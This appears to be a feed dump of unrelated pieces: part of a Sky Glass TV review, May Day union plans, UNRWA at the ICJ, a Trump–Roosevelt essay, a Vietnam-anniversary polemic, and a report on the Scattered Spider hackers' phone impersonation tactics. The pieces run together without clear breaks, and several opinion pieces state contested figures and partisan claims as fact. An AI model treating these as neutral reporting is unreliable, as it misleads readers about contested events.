Photograph: Samuel Gibbs/The Guardian
Since the original Glass’s launch in 2021, the Sky OS service powering it has dramatically improved. It still has excellent search and an improved playlist function, with more than one user profile so everyone in the house can have their own lists and recommendations, including child profiles.
The playlist feature automatically keeps track of new episodes of shows and films you want to watch, regardless of which service they’re available from. It feeds into a recently added “continue watching” rail that helps you jump straight back into the content you were previously watching, which is all I needed about 75% of the time.
Watching, pausing and rewinding live TV works great. Recent reductions to the broadcast delay for sports have made a meaningful difference, preventing the irritating scenario where a friend watching on satellite or aerial a little ahead of you texts to brag about a goal before you’ve managed to actually see it.
On-demand content from the Sky platform works really well, but a bigger improvement is in the third-party on-demand services such as BBC iPlayer, ITV X and Channel 4, on which you are reliant in place of recordings. It’s still not quite as fast and seamless as having local recordings, such as you might on Sky Q or other PVR, but most of the apps launch quicker, work better and will take you straight to the episode you want to watch from the playlist or search page.
It supports most of the major on-demand services, including My5, YouTube, Prime Video, Disney+, Paramount+, Apple TV+ and Discovery+, for all your content in one place.
Voice control works well through the button on the remote, but the TV’s wake word is a little temperamental, working properly or understanding me about 60% of the time.
Photograph: Samuel Gibbs/The Guardian
Sustainability
The television is repairable apart from the screen. It contains 22% recycled material, including aluminium, fabric, tin and plastic. The company will recycle its old products and ships the TV in plastic-free packaging.
Price
Sky Glass gen 2 costs £699 at 43in, £949 at 55in or £1,199 at 65in, with 24- or 48-month interest-free payment plans available for all models with a £20 upfront cost.
On 24-month contracts, Sky Essential TV costs from £15 a month, Sky Ultimate TV from £22 a month, and UHD + Dolby Atmos costs an additional £6, as does the ability to skip ads. Other add-ons include Sky Sports from £31 a month, TNT Sport from £31 a month, Sky Cinema from £13 a month and Sky Kids at £8 a month. Some discounts are available for certain combinations, while all the packages can be bought on a 31-day basis at different prices.
Verdict
The first-generation Glass required work when it launched, both to the television screen and to the Sky streaming service powering it. The gen 2 model rights many of the wrongs of its predecessor.
It is brighter, faster, has higher contrast and handles highlights far better. It is also easily the best-sounding TV available. It competes fairly well in the mid-range market but you can certainly buy a better-looking screen for similar money without a soundbar; those looking for the absolute best picture should look elsewhere.
The Sky OS service has greatly improved to a level that rivals the best in the business. Live broadcast works just as it might over satellite or aerial. On-demand content from the Sky platform is as good as local recordings while the third-party apps such as BBC iPlayer and ITVX have levelled up to at least an acceptable standard. The playlist and search with support for all the major streaming services are the killer features, removing the burden of remembering which of the plethora of services hosts the content you want to watch.
Above all, it is the level of convenience offered by the Glass gen 2, of an all-in one solution with solid sound and a single remote for all your TV needs, that is the major appeal.
Pros: all-in-one streaming and pay TV device, great sound, no satellite/cable or aerial needed, good remote, excellent search and playlist functions, improved apps, improved picture and good HDR, custom picture modes, optional motion-sensing and voice control.
Cons: better picture available for less from competitors, some picture modes and automatic brightness control aren’t great, no fast refresh rate for game consoles, thick and heavy, no Chromecast support, some third-party catchup/on-demand services still aren’t great.
The power and a mic mute button are in the right side of the TV.
Photograph: Samuel Gibbs/The Guardian
The Secret Service's involvement in the making of In the Line of Fire (1993) [pdf]
Where are the pitchforks? President Donald Trump’s administration has declared open season on the working class. Its henchmen have unleashed kidnappings by state agents, worksite raids that spread terror and stifle workplace militancy, massive federal layoffs, funding cuts with devastating consequences and attacks on diversity, equity and inclusion, as well as efforts to eliminate collective bargaining rights wholesale. The array of assaults may appear dizzying, but that’s by design: Confusion, division, fear and hopelessness are classic boss tactics, intended to silence dissent and chill organizing. We’re now seeing them on a national scale, as Trump and his cronies work to consolidate power while handing out tax cuts for billionaire pals and giving corporations carte blanche to fleece the public and the services they depend on (including access to medical care). The end game is oligarchy.
Amid the fear and uncertainty, the organized working class, comprising 14 million union members, has largely been quiet or focused on their individual fights. But the scope and horror of attacks on workers have jolted unions to consider new tactics and forge new alliances.
A May Day Strong coalition of over 200 organizations, including major national labor unions and hundreds of community organizations, is planning 1,273 mass mobilizations, from strikes to sit-downs to rallies, across 1,031 cities and towns nationwide on International Workers Day, May 1. Among the anchoring organizations are the Chicago Teachers Union (which first brought groups together), National Education Association, American Federation of Teachers, Communication Workers of America, Association of Flight Attendants-CWA and United Electrical Workers, as well as the Sunrise Movement, the Center for Popular Democracy, Indivisible, and a panoply of other issue-based organizations, from Palestine organizing to reproductive justice to immigrant rights.
Participants will raise the unifying banner “For the Workers, Not the Billionaires,” a nod to the populist message of Occupy Wall Street in 2011, when thousands of people turned out to denounce bankers for the taxpayer-funded bailout.
“For many of the organizations involved with May Day mobilizations, this is the first time we are working outside of our union sector or region, and alongside federal government and private sector locals, with the participation of national community networks and their local affiliates,” wrote Jackson Potter, vice president of the Chicago Teachers Union, in Convergence magazine. CTU is one of the main conveners of the May Day Strong Coalition. The national day of action, Potter continued, “[gives] us new partners to map geographies that have burgeoning union organizing campaigns, nodes of production where workers have disproportionate power, and community forces willing to throw down to defend our democratic rights and institutions.”
In some instances, unions are linking preexisting struggles against billionaire employers, whether university systems, hospitals or the superrich, and tying them to the broader class-wide assaults Trump has turbocharged in his 101 days in office. In others, community organizations and unions are testing out new alliances to bridge specific campaigns to a broader class-struggle orientation that positions working-class people as the countervailing power to billionaire rule. Will this be a dress rehearsal for a possible general strike in May 2028? It’s all premature to say in these whirlwind times. But one thing is for sure: Working people will be flexing their collective muscles in a range of arenas in class struggle, from saving Medicaid to standing up for federal workers, nurses, immigrants and any human being whose rights are being trampled on by Trump and his minions. May Day will be a national demonstration that will polarize today’s struggle not along resentful, racist lines of immigrant vs. “native,” but along the class-struggle lines of workers vs. billionaires.
In Chicago, the site of the 1886 Haymarket affair that sparked the May Day holiday, the organizing got started with an in-person convening in March, followed by online meetings that drew thousands of participants. The CTU, Arise Chicago and dozens of other labor unions and community organizations will lead a march at 11 a.m. from Unity Park to Grant Park. The action not only honors the pitched battle for an eight-hour day in 1886, but also the 400,000-person march on May 1, 2006 to defeat a measure criminalizing undocumented immigrants. A loose coalition of immigrant rights organizations in Chicago is organizing one-day strikes, distributing letters through social media and other channels reminding workers of their right to withhold their labor to protest unfair labor practices at their workplaces.
Minnesota will have a full day of actions, including a rally of airport workers at 12 p.m. to stand up to Trump and Musk as well as to corporations like Delta, Uber, Lyft and the Metropolitan Airports Commission. Anchoring organizations include local immigrant rights groups and SEIU Local 26, UNITE HERE Local 17, the Flight Attendants, the Machinists, Teamsters Local 120, and AFGE. Later at 5 p.m., a unity rally at the state Capitol is expected to draw tens of thousands, and will include liberal anti-Trump groups like Indivisible.
In Philadelphia, Sen. Bernie Sanders (I-Vt.) will headline a hundreds-strong rally at City Hall with local labor and immigration-rights leaders. In New Orleans, hundreds of registered nurses at University Medical Center will go on strike as they negotiate for a first contract.
California will see some of the largest actions. Twenty thousand healthcare, research and technical workers across the University of California system have timed their unfair labor practice strike for May 1. Their union, UPTE of Communications Workers Local 9119, is striking because UC announced a systemwide hiring freeze on March 19, 2025, using Trump’s threatened cuts as cover, without giving the union notice or an opportunity to bargain.
UPTE President Dan Russell, who was elected as part of a reform slate in 2021, says the University of California is “using the political climate as an excuse for the behavior that they had already been exhibiting … which is refusing to bargain in good faith to address the staffing crisis, and just continuing to commit, you know, one unfair labor practice after another.”
AFSCME Local 3299, representing more than 37,000 patient care workers across the same UC system, also plans a walk-out on May Day over similar illegal hiring freeze allegations. “The University of California sits on $10 billion in unrestricted reserves,” says Todd Stenhouse, spokesperson for AFSCME 3299. “It has routinely handed out raises of 30-40% to its growing legion of Ivory Tower elites, chancellors and the like. It provides them low-interest home loans. They can use them to buy second homes. And all the while the front liners, the people that answer the call button, people that are sweeping the floors, people that are serving the food right, are struggling like never before to make ends meet.
“International Workers Day is a time for workers to celebrate the ongoing struggle, but it is also a time to reclaim our voice in a very uncertain time against employers who, frankly, don’t know what it means to walk in our shoes.”
At noon, the expected 60,000 will swell in number as other unions join in solidarity rallies across California, including the United Auto Workers 4811, UC-AFT 1474, Teamsters Local 2010, and the California Nurses Association. There’s also a planned teach-in at 1:30 p.m.
In Georgia, the Union of Southern Service Workers is planning a march on Atlanta City Hall alongside partnering organizations, including the Coalition of Black Trade Unionists, Atlanta Jobs with Justice, United Campus Workers, Georgia Latino Alliance for Human Rights and the Indivisible Project. Planned stops include an immigrant detention center and a local OSHA office.
Katie Giede, an 11-year server at Waffle House and member of the Union of Southern Service Workers, said she would be marching to take on billionaires like Waffle House boss Joe Rogers III. Last year, she and her co-workers pressured their employer to raise wages from $2.92 to $5.25 hourly in two years across most markets.
Reprinted with permission from In These Times. All rights reserved.
UNRWA Chief Accuses Israel of Torturing Staff as US Backs Ban on Agency at World Court
Portside
portside.org
2025-05-01 06:38:59
As the International Court of Justice this week weighs an Israeli ban on a United Nations agency that provides lifesaving aid in Gaza, the program's leader called out attacks on its workers while the United States defended Israel—the recipient of billions of dollars in U.S. military assistance.
The ICJ is holding a week of hearings in The Hague, Netherlands, following the U.N. General Assembly's December passage of a Norwegian-led resolution asking the tribunal, which is also known as the World Court, for an advisory opinion on Israel's legal obligation to "ensure and facilitate the unhindered provision of urgently needed supplies essential to the survival of the Palestinian civilian population."
Among the 38 nations and three regional blocs scheduled to address the 15 ICJ judges, only the United States and Hungary have so far defended Israel, whose forces have killed nearly 300 United Nations Relief and Works Agency for Palestine Refugees in the Near East (UNRWA) workers during their nearly 19-month annihilation of Gaza.
"An occupational power retains a margin of appreciation concerning which relief schemes to permit," U.S. State Department legal adviser Joshua Simmons argued before the court Wednesday, referring to Israel's 58-year occupation of Palestine, which the ICJ
ruled
an illegal form of apartheid in a June 2024 advisory opinion.
"Even if an organization offering relief is an impartial humanitarian organization, and even if it is a major actor, occupation law does not compel an occupational power to allow and facilitate that specific actor's relief operations," Simmons continued, noting "serious concerns about UNRWA's impartiality, including information that Hamas has used UNRWA facilities and that UNRWA staff participated in the October 7th terrorist attack against Israel" in 2023.
"Given these concerns, it is clear that Israel has no obligation to permit UNRWA specifically to provide humanitarian assistance," Simmons added. "UNRWA is not the only option for providing humanitarian assistance in Gaza."
In what UNRWA Commissioner-General Philippe Lazzarini described at the time as an act of "reverse due process," the agency fired nine employees in February 2024 following Israeli allegations that they were involved in the Hamas-led attack on Israel in which more than 1,100 Israelis were killed and 251 Israeli and foreign survivors were kidnapped.
Lazzarini admitted to terminating the staffers without due process or an adequate investigation of Israel's claims. A subsequent probe by the U.N. Office of Oversight Services "was not able to independently authenticate information used by Israel to support the allegations."
On Tuesday, Lazzarini reminded the world that "over 50 UNRWA staff—among them teachers, doctors, social workers—have been detained and abused" by Israeli forces since October 2023.
"They have been treated in the most shocking and inhumane way," he continued. "They reported being beaten up and used as human shields. They were subjected to sleep deprivation, humiliation, threats of harm to them and their families, and attacks by dogs. Many were subjected to forced confessions."
Those forced confessions spurred numerous nations including the United States to cut off funding to UNRWA. Almost all of the countries have since restored funding as Israel's claims have been debunked or questioned over a lack of evidence.
The U.S.—which has not restored funding for UNRWA—earlier this week abandoned its long-standing position that the body is immune from lawsuits, opening the door for cases by October 7 survivors and victims' relatives stemming from dubious claims of agency involvement in the attack.
In addition to accusing Israeli troops of torturing its staffers, UNRWA has also documented tortures allegedly suffered by Palestinians imprisoned by Israel, including interrupted drowning—also known as waterboarding—being shot in the knees with nail guns, sexual abuse of both men and women, and being sodomized with electric batons. The Israel Defense Forces is investigating dozens of in-custody deaths, many of them at the notorious Sde Teiman base in the Negev Desert.
While Israel's physical assault on Gaza has killed hundreds of UNRWA workers, its diplomatic war on the U.N. has seen the agency banned from operating in Palestine and U.N. Secretary-General António Guterres declared "persona non grata" in Israel after he included Israel on his 2024 "list of shame" of countries and armed groups that kill and injure children during wartime.
The U.S.-backed 572-day war waged by the far-right government of Israeli Prime Minister Benjamin Netanyahu—who is a fugitive from the International Criminal Court—has left more than 184,000 Palestinians dead, maimed, or missing in Gaza, according to the Gaza Health Ministry. Nearly all of the embattled enclave's more than 2 million people have been forcibly displaced and Israel's "complete siege" of the coastal strip has fueled widespread starvation and illness.
This week's ICJ hearing comes amid the tribunal's ongoing genocide case against Israel, which was brought by South Africa and is backed by dozens of nations either individually or via regional blocs. The court has issued three provisional orders in the case, all of which Israel has been accused of flouting.
Responding to the U.S. intervention in this week's ICJ hearings, Palestinian Ambassador to the Netherlands Ammar Hijazi told Middle East Eye that "everybody knows that Israel is using humanitarian aid as a weapon of war and is starving the population in Gaza because of that."
U.N. agencies and international humanitarian groups have warned in recent days of the imminent risk of renewed famine in Gaza as food stocks run out.
"The U.S. intervention is very narrow in its scope, when it highlights the rights of an occupying power but ignores the so many layers of duties of that occupying power that Israel is in violation of," Hijazi added.
Among the countries defending UNRWA during Wednesday's ICJ session were Indonesia and Russia, which is currently waging a war against Ukraine. Indonesian Foreign Minister Sugiono affirmed "the Palestinian people's right to self-determination," while Maksim Musikhin, legal director of Russia's Foreign Ministry, argued that "international law should be respected by Israel" and that UNRWA deserves a Nobel Peace Prize.
The New Deal Is a Stinging Rebuke to Trump and Trumpism
Portside
portside.org
2025-05-01 06:25:42
There is no question that Donald Trump’s ambition in the first 100 days of his return to the Oval Office was to set a new standard for presidential accomplishment. To rival, even surpass, the scope of Franklin Roosevelt’s efforts nearly a century ago, when he moved so quickly — and so decisively — that he established the first 100 days as a yardstick for executive action.
But as consequential as they have been, and as exhausting as they’ve felt to many Americans, these first months of Trump’s second term fall far short of what Roosevelt accomplished. Yes, Trump has wreaked havoc throughout the federal government and destroyed our relationships abroad, but his main goal — the total subordination of American democracy to his will — remains unfulfilled. You could even say it is slipping away, as he sabotages his administration with a ruinous trade war, deals with the stiff opposition of a large part of civil society and plummets in his standing with most Americans.
If measured by his ultimate aims, Trump’s first 100 days are a failure. To understand why he failed, we must do a bit of compare-and-contrast. First, let’s look at the details of Trump’s opening gambit. And second, let’s measure his efforts against the man who set the terms in the first place: Franklin Delano Roosevelt. To do so is to see that the first 100 days of Trump’s second term aren’t what we think they are. More important, it is to see that the ends of a political project cannot be separated from the means that are used to bring it into this world.
Trump began his second term with a shock-and-awe campaign of executive actions. He, or rather the people around him, devised more than 100 executive orders, all part of a program to repeal the better part of the 20th century — from the New Deal onward — as well as fundamentally transform the relationship between the federal government and the American people.
His ultimate aim is to turn a constitutional republic centered on limited government and the rule of law into a personalist autocracy centered on the rule of one man, Donald J. Trump, and his unlimited authority. Trump’s vision for the United States, put differently, has more in common with foreign dictatorships than it does with almost anything you might find in America’s tradition of republican self-government.
To that end, the president’s executive orders are meant to act as royal decrees — demands that the country bend to his will. In one, among the more than four dozen issued in his first weeks in office, Trump purports to purge the nation’s primary and secondary schools of supposed “radical indoctrination” and promote a program of “patriotic education” instead. In another, signed in the flurry of executive activity that marked his first afternoon back in the Oval Office, Trump asserts the power to define “biological” sex and “gender identity” themselves, in an attempt to end official recognition of trans and other gender nonconforming people.
In Trump’s America, diversity, equity and inclusion programs aren’t just frowned upon; they’re grounds for purges in the public sector and investigations in the private sector. Scientific and medical research must align with his ideological agenda; anything that doesn’t — no matter how promising or useful — is on the chopping block. Any institutions that assert independent authority, like law firms and universities, must be brought to heel with the force of the state itself. Everything in American society must align with the president’s agenda. Those who disagree might find themselves at the mercy of his Department of Justice or worse, his deportation forces.
Trump claims sovereign authority. He claims the right to dismantle entire federal agencies, regardless of the law. He claims the right to spend taxpayer dollars as he sees fit, regardless of what Congress has appropriated. He even claims the right to banish American citizens from the country and send them to rot in a foreign prison.
Trump has deployed autocratic means toward authoritarian ends. And the results, while sweeping, rest on a shaky foundation of unlawful and potentially illegal executive actions.
Now, let’s consider Roosevelt.
It’s from Roosevelt, of course, that we get the idea that the 100th day is a milestone worth marking.
Roosevelt took office at a time of deprivation and desperation. The Great Depression had reached its depths during the winter of his inauguration in March 1933. Total estimated national income had dropped by half, and the financial economy had all but shut down, with banks closed and markets frozen. About one-quarter of the nation’s work force — or close to 15 million people — was out of work. Countless businesses had failed. What little relief was available, from either public or private sources, was painfully inadequate.
“Now is the winter of our discontent the chilliest,” Merle Thorpe, the editor of Nation’s Business — then the national magazine of the U.S. Chamber of Commerce — wrote in an editorial that captured the mood of the country on the eve of Roosevelt’s inauguration. “Fear, bordering on panic, loss of faith in everything, our fellow-man, our institutions, private and government. Worst of all, no faith in ourselves, or the future. Almost everyone ready to scuttle the ship, and not even ‘women and children first.’”
It was this pall of despair that led Roosevelt to tell the nation in his Inaugural Address that “the only thing we have to fear is fear itself — nameless, unreasoning, unjustified terror which paralyzes needed efforts to convert retreat into advance.” Despite the real calls for someone to seize dictatorial power in the face of crisis, Roosevelt’s goal — more, possibly, than anything else — was to rescue and rejuvenate American democracy: to rebuild it as a force that could tame the destructive power of unregulated capitalism.
As such, the new president insisted, the country “must move as a trained and loyal army willing to sacrifice for the good of a common discipline.” His means would fit his ends. He would use democracy to save democracy. He would go to the people’s representatives with an ambitious plan of action. “These measures,” he said, “or such other measures as the Congress may build out of its experience and wisdom, I shall seek, within my constitutional authority, to bring to speedy adoption.”
What followed was a blitz of action meant to ameliorate the worst of the crisis. “On his very first night in office,” the historian William E. Leuchtenburg (who died three months ago) recounted in his seminal volume, “Franklin D. Roosevelt and the New Deal, 1932-1940,” Roosevelt “directed Secretary of the Treasury William Woodin to draft an emergency banking bill, and gave him less than five days to get it ready.”
Five days later, on March 9, 1933, Congress convened a special session during which it approved the president’s banking bill with a unanimous vote in the House and a nearly unanimous vote in the Senate. Soon after, Roosevelt urged the legislature to pass an unemployment relief measure. By the end of the month, on March 31, Congress had created the Civilian Conservation Corps.
This was just the beginning of a burst of legislative and executive activity. On May 12 alone, Roosevelt signed the Federal Emergency Relief Act — establishing the precursor to the Works Progress Administration — the Agricultural Adjustment Act and the Emergency Farm Mortgage Act. He signed the bill creating the Tennessee Valley Authority less than a week later, on May 18, and the Securities Act regulating the offer and sale of securities on May 27. On June 16, Roosevelt signed Glass-Steagall, a law regulating the banking system, and the National Industrial Recovery Act, an omnibus business and labor relations bill with a public works component. With that, and 100 days after it began, Congress went out of session.
The legislature, Leuchtenburg wrote,
had written into the laws of the land the most extraordinary series of reforms in the nation’s history. It had committed the country to an unprecedented program of government-industry cooperation; promised to distribute stupendous sums to millions of staple farmers; accepted responsibility for the welfare of millions of unemployed; agreed to engage in far-reaching experimentation in regional planning; pledged billions of dollars to save homes and farms from foreclosure; undertaken huge public works spending; guaranteed the small bank deposits of the country; and had, for the first time, established federal regulation of Wall Street.
And Roosevelt, Leuchtenburg continued, “had directed the entire operation like a seasoned field general.” The president even coined the “hundred days” phrasing, using it in a July 24, 1933, fireside chat on his recovery program, describing it as a period “devoted to the starting of the wheels of the New Deal.”
The frantic movement of Roosevelt’s first months set a high standard for all future presidents; all fell short. “The first 100 days make him look like a minor league statesman,” said one journalist of Roosevelt’s successor Harry S. Truman. The Times described the first 100 days of the Eisenhower administration as a “slow start.” And after John F. Kennedy’s first 100 days yielded few significant accomplishments, the young president let the occasion pass without remark.
There is much to be said about why Roosevelt was able to do so much in such a short window of time. It is impossible to overstate the importance of the crisis of the Depression. “The country was in such a state of confused desperation that it would have followed almost any leader anywhere he chose to go,” observed the renowned columnist and public intellectual Walter Lippmann. It also helped that there was no meaningful political opposition to either Roosevelt or the Democratic Party — the president took power with overwhelming majorities in the House and the Senate. The Great Depression had made the Republicans a rump party, unable to mount an effective opposition to the early stages of the New Deal.
This note on Congress is key. Beyond the particular context of Roosevelt’s moment, both the expectation and the myth of Roosevelt’s 100 days miss the extent to which it was a legislative accomplishment as much as an executive one. Roosevelt did not transform the United States with a series of executive orders; he did so with a series of laws.
Roosevelt was chief legislator as much as he was chief executive. “He wrote letters to committee chairmen or members of Congress to urge passage of his proposals, summoned the congressional leadership to White House conferences on legislation … and appeared in person before Congress,” Leuchtenburg wrote in an essay arguing that Roosevelt was “the first modern president”:
He made even the hitherto mundane business of bill signing an occasion for political theater; it was he who initiated the custom of giving a presidential pen to a congressional sponsor of legislation as a memento.
Or as the journalist Raymond Clapper wrote of Roosevelt at the end of his first term: “It is scarcely an exaggeration to say that the president, although not a member of Congress, has become almost the equivalent of the prime minister of the British system, because he’s both executive and the guiding hand of the legislative branch.”
Laws are never fixed in place. But neither are they easily moved. It’s for this reason that any president who hopes to make a lasting mark on the United States must eventually turn to legislation. It is in lawmaking that presidents secure their legacy for the long haul.
This brings us back to Trump, whose desire to be a strongman has led him to rule like a strongman under the belief that he can impose an authoritarian system on the United States through sheer force of will.
His White House doesn’t just rely on executive orders; it revolves around them. They are the primary means through which the administration takes action (he has signed only five bills into law), under a radical assertion of executive power: the unitary executive taken to its most extreme form. And for Trump himself, they seem to define his vision of the presidency. He holds his ceremonies — always televised, of course — where subordinates present his orders as he gushes over them.
But while we have no choice but to recognize the significance of the president’s use of executive power, we also can’t believe the hype. Just because Trump desires to transform the American system of government doesn’t mean that he will. Autocratic intent does not translate automatically into autocratic success.
Remember, an executive order isn’t law. It is, as Philip J. Cooper explained in “By Order of the President: The Use and Abuse of Executive Direct Action,” a directive “issued by the president to officers of the executive branch, requiring them to take an action, stop a certain type of activity, alter policy, change management practices, or accept a delegation of authority under which they will henceforth be responsible for the implementation of law.” When devised carefully and within the scope of the president’s lawful authority, an executive order can have the force of law (provided the underlying statute was passed within the constitutional authority of Congress), but it does not carry any inherent authority. An executive order is not law simply because the president says it is.
Even though Trump seems to think he is issuing decrees, the truth is that his directives are provisional and subject to the judgment of the courts as well as future administrations. And if there is a major story to tell about Trump’s second term so far, it is the extent to which many of the president’s most sweeping executive actions have been tied up in the federal judiciary. The White House, while loath to admit it, has even had to back down in the face of hostile rulings.
The president might want to be a king, but despite the best efforts of his allies on the Supreme Court, the American system is not one of executive supremacy. Congress has all the power it needs to reverse the president’s orders and thwart his ambitions. Yes, the national legislature is held by the president’s party right now. But that won’t be a permanent state of affairs, especially given the president’s unpopularity.
MAGA propaganda notwithstanding, Trump is not some grand impresario skillfully playing American politics to his precise tune. He may want to bend the nation to his will, but he does not have the capacity to do the kind of work that would make this possible, as well as permanent — or as close to permanent as lawmaking allows. If Roosevelt’s legislative skill was a demonstration of his strength, then Trump’s reliance on executive orders is a sign of his weakness.
None of this is to discount the real damage that he has inflicted on the country. It is precisely because Republicans in Congress have abdicated their duty to the Constitution that Trump has the capacity to act in such catastrophic ways.
But the overarching project of the second Trump administration — to put the United States on the path toward a consolidated authoritarian state — has stalled out. And it has done so because Trump lacks what Roosevelt had in spades: a commitment to governance and a deep understanding of the system in which he operated.
Roosevelt could orchestrate the transformative program of his 100 days because he tied his plan to American government as it existed, even as he worked to remake it. Trump has pursued his by treating the American government as he wants it to be. It is very difficult to close the gap between those two things, and it will become all the more difficult as the bottom falls out of Trump’s standing with the public.
Do not take this as succor. Do not think it means that the United States is in the clear. American democracy is still as fragile and as vulnerable as it has ever been, and Trump is still motivated to make his vision a reality. He may even lash out as it becomes clear that he has lost whatever initiative he had to begin with. This makes his first 100 days less a triumph for him than a warning to the rest of us. The unthinkable, an American dictatorship, is possible.
But Trump may not have the skills to effect the permanent transformation of his despotic dreams. Despite the chaos of the moment, it is possible that freedom-loving Americans have gotten the luck of the draw. Our most serious would-be tyrant is also among our least capable presidents, and he has surrounded himself with people as fundamentally flawed as he is.
On Inauguration Day, Donald Trump seemed to be on top of the world. One hundred days later, he’s all but a lame duck. He can rage and he can bluster — and he will do a lot more damage — but the fact of the matter is that he can be beaten. Now the task is to deliver him his defeat.
Why April 30th Should Be a National Holiday
Portside
portside.org
2025-05-01 06:05:18
Why April 30th Should Be a National Holiday
Mark Brody
Thu, 05/01/2025 - 01:05
...
Vietnam Veterans Against the War demonstrate at Arlington National Cemetery, 1971.
Fifty years ago today, on April 30, 1975, Vietnam defeated the United States of America.
It’s called “The Vietnam War” — but the Vietnamese call it, more accurately, “The American War.” Because it was the Americans who invaded Vietnam eleven years earlier to kill and dominate its people.
In those 11 years, we slaughtered two million Vietnamese and perhaps another two million southeast Asians in Cambodia and Laos and beyond. Nearly 4 million murdered by the United States! (For context, that’s about two-thirds the number of Jews that the Germans killed in the Holocaust during World War II.)
Unlike the Germans, we, collectively as a nation, have never paid for these crimes against humanity. We have never admitted our guilt in this genocide, never apologized, never shown a speck of remorse, never made any reparations (and no, I don’t count the Nike factories).
And we have continued our policy of invasion and funding and arming genocide to this day. We funded and armed the slaughters in Central America well into the 1980s. We armed the Iraqis in their war with Iran. Then we spent over two decades bombing and eventually invading Iraq and slaughtering their people — while also losing a two-decade-long war with Afghanistan.
We do not tell our children, nor teach our students, the real truth of the atrocities we’ve conducted, from our first mass genocide of the Native Peoples of the Americas committed by our White Christian European ancestors, to currently the billions of our taxpayer dollars and tons of American bombs plus scores of fighter jets and other weapons of mass destruction being given to the Netanyahu regime in Israel to massacre tens of thousands of Palestinian civilians. And for the two million Palestinians still barely alive in Gaza, we now support a horrific plan to starve them to death, their homes now nearly all reduced to rubble (92% of Gaza has been flattened, according to the UN), with virtually no access to drinking water or medicine, and nearly every hospital, every school and every university bombed to smithereens. It will take years to discover under all the rubble what the real numbers of the dead are. And this doesn’t even take into account the daily attacks on the 3+ million Palestinians in the Occupied West Bank.
We, you and I, are the backers of all this misery. Joe Biden bankrolled it. It cost him and Kamala Harris the election. Nearly a third — 29% — of the millions of people who voted for Biden in 2020 but who didn’t vote for Harris in 2024 cited their top reason as the Biden/Harris administration’s support for and funding of the war on Gaza. (This was more than those who cited the economy or immigration as their main reason.) The media will not report it this way (“It’s the price of eggs!”), just as no media today on this 50th anniversary will state the simple truth that we, the mighty USA, were defeated in Vietnam by one of the poorest countries on Earth, a country which did not possess a single aircraft carrier, no destroyers, no B-52-style bombers — not even one goddamn attack helicopter! They did not have tank divisions, nor a single canister of napalm, no amphibious assault vehicles, not even one pathetic military Jeep that wasn’t a Soviet tin-can knock-off with maybe three wheels on it. They had nothing but the will of their own people to be free of the freedom-loving Americans.
They kicked the ass of a military superpower — and sent 60,000 of our young men home to us in wooden boxes (nine of them from my high school, two on my street) and hundreds of thousands more who returned without arms, legs, eyes or the mental capacity to live life to its fullest, forever affected, their souls crushed, their nightmares never-ending. All of them destroyed by a lie their own government told them about North Vietnam “attacking” us and the millions of Americans who at first believed the lie. This past November 5th showed just how easy it still is for an American president, a man who lies on an hourly basis, to get millions of his fellow citizens to fall for it.
That is why we need to make this day, April 30th, a national holiday. Usually, national holidays are used to celebrate victories and commemorate triumphs, like signing the Declaration of Independence or saving all the Indians from starving to death during winter (not true) or whatever Thanksgiving is all about. So why would we create a holiday to commemorate our defeat in Vietnam?
I think we need to do this for our children’s sake, for our grandchildren, for the sake of our future if there still is one for us. We should take just one day every year and participate in a national day of reckoning, recollection, reflection, and truth-telling, where together we actively seek forgiveness, make reparations and further our understanding of just how it happened and how easy it is for the wealthy and the political elites and the media to back such horror, and then to get the majority of the country to go along with it… at least at first. And how quickly after it’s over we decide that we never have to talk about it again. That we can learn nothing from it, and change nothing after it.
The best way to honor the loss from this tragic war is to commit to never doing it again — and that has to start by realizing we are doing it again right now.
Every bomb we send to Netanyahu is proof that we didn’t learn a single lesson.
I encourage every one of you — whether you’ve seen it before or have never seen it — to watch the Oscar-winning Peter Davis documentary HEARTS & MINDS tonight or this coming weekend. It is the most powerful nonfiction film I have ever seen. You can watch it with any Max subscription or on the Criterion Channel. You can rent it on Apple TV+ or Amazon Prime.
Here is a short clip from the film, featuring Daniel Ellsberg, who revealed the true scope of the war when he leaked the Pentagon Papers to the New York Times, showing how the U.S. government was lying about the war:
Ellsberg: “The question used to be: ‘Might it be possible that we were on the wrong side in the Vietnamese War?’ But we weren’t on the wrong side. We are the wrong side.”
And we were the wrong side again in Iraq. In Afghanistan. In Gaza. How did we get here? We got here because we’ve always been here. Start in 1492 and go forward.
Remember that.
Teach our children this truth about us. About our history. Give them this knowledge and with it comes the opportunity for us to change and make different choices for our future. To be a different people. A peaceful people. The Germans did it. The Japanese, too.
Today is a tragic and solemn day. And it should be a national holiday.
Vietnam’s largest military cemetery of war dead in Quang Tri province. The lens of the camera is not wide enough to capture the vastness of this sacred place.
Images by Steven Clevenger/Corbis via Getty Images; and HOANG DINH NAM / AFP via Getty Images
How ‘native English’ Scattered Spider group linked to M&S attack operate
Guardian
www.theguardian.com
2025-05-01 06:00:15
Cybersecurity expert says group are ‘unusual but potently threatening’ coalition of ransomware hackers If there is one noticeable difference between some members of the Scattered Spider hacking community and their ransomware peers, it will be the accent. Scattered Spider has been linked to a cyber-a...
If there is one noticeable difference between some members of the Scattered Spider hacking community and their ransomware peers, it will be the accent.
This helps with one of the techniques in their armoury that a Russian hacker might struggle to replicate: ringing up company IT desks and gaining entry to systems by pretending to be employees, or pretending to be from company IT desks and calling employees.
“Native English authenticity can sometimes lead to an automatic sense of trust. There is a level of perceived familiarity that might cause personnel or even IT teams to lower their guard slightly,” says Nathaniel Jones, the vice-president of threat research at the cybersecurity firm Darktrace.
In November last year, the US Department of Justice gave an insight into Scattered Spider’s alleged personnel by charging five individuals over the targeting of unnamed American companies with “phishing” text messages.
The DoJ alleged that the accused sent fake texts to employees that tricked them into providing confidential information including their company logins. As a result, sensitive data was stolen – including intellectual property – as well as millions of dollars’ worth of cryptocurrency from people’s digital wallets.
All of the accused were in their 20s at the time they were charged. The DoJ charged four people in the US, their ages ranging from 20 to 25, as well as the Scottish 23-year-old Tyler Buchanan, who was deported to the US from Spain last week. He is due to appear in court in Los Angeles on 12 May.
The US cybersecurity agency revealed Scattered Spider’s IT desk gambit in a notice published in 2023.
Victims attributed to other Scattered Spider attacks include the casino operators MGM Resorts and Caesars Entertainment, which were hit in 2023. After that attack, West Midlands police announced last year that it had arrested a 17-year-old in Walsall. The force has been contacted for an update on the case.
Scattered Spider was named as the alleged perpetrator of the M&S attack by BleepingComputer, a tech news site. BleepingComputer reported that the attackers then deployed a piece of malicious software-for-hire known as DragonForce to disable parts of the retailer’s IT network.
